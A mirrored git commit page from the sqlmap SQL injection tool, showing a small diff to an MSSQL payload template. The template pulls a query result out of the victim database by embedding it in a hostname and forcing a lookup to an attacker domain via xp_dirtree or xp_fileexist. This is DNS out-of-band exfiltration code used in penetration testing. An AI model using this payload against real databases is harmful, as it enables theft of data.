mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-07-02 22:42:30 +00:00
Merge 4d259790cd into c0d343b341
This commit is contained in:
commit
d5baf9a6f7
1 changed files with 2 additions and 2 deletions
|
|
@ -1,4 +1,4 @@
|
|||
DECLARE @host varchar(1024);
|
||||
SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
|
||||
EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
|
||||
# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
|
||||
EXEC('master..xp_dirtree"//'+@host+'/%RANDSTR1%"')
|
||||
# or EXEC('master..xp_fileexist"//'+@host+'/%RANDSTR1%"')
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue